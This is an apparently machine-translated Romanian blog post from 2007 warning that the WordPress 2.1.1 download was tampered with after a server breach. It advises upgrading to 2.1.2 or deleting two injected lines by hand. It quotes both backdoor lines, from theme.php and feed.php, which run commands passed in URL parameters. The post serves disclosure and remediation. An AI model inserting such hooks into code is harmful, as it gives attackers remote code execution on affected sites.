Înscrieţi-vă la buletine de ştiri sau de a-mi Feed-uri RSS pentru a primi în mod automat actualizările de blog!

Wordpress 2.1.1 este periculos!



Iată cum echipa Wordpress defineşte recentă versiune de WP. Motivul este simplu: cu câteva zile în urmă o cracare a încălcat unele dintre server worpress.org, reuşind să schimbe pachet de instalare care este descărcat de obicei: schimbările par a afecta doar câteva fişiere de la distanţă pentru a permite PHP code. Pentru a rezolva această problemă, există două alternative:

    1. Descarca versiunea 2.1.2 a lansat prompt de la dezvoltatori şi Wordpress upgrade.
    2. Eliminaţi de mână, cod maliţios (ca mine, dacă nu aţi dori / timp să instalaţi noua versiune).
    Aceasta este pur şi simplu:
    -- A identifica şi elimina din fişier "wp-includes/theme.php" următoarea linie de cod: 
      if ($ _GET [ "iz"]) (get_theme_mcommand ($ _GET [ "iz "]);)

    -- A identifica şi elimina din fişier "wp-includes/feed.php" următoarea linie de cod: 

      if ($ _GET [ "IX"]) (comment_text_phpfilter ($ _GET [ "ix "]);)
Aboneaza-mi Feed-uri RSS Ai dori acest articol? Aboneaza-te acum Feed-uri RSS!



Dată Scris pe 6 martie, 2007 la 12:06 la Securitate, Web
Partajare Partajaţi | Tags: crack, biscuiti, securitate, Web, WordPress

Tot no comment "

RSS pentru comentariile acestui post. Trackback URI

Lăsaţi un comentariu

XHTML: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>


Valid XHTML şi CSS. ^ Sus


Închide
Trimite prin e-mail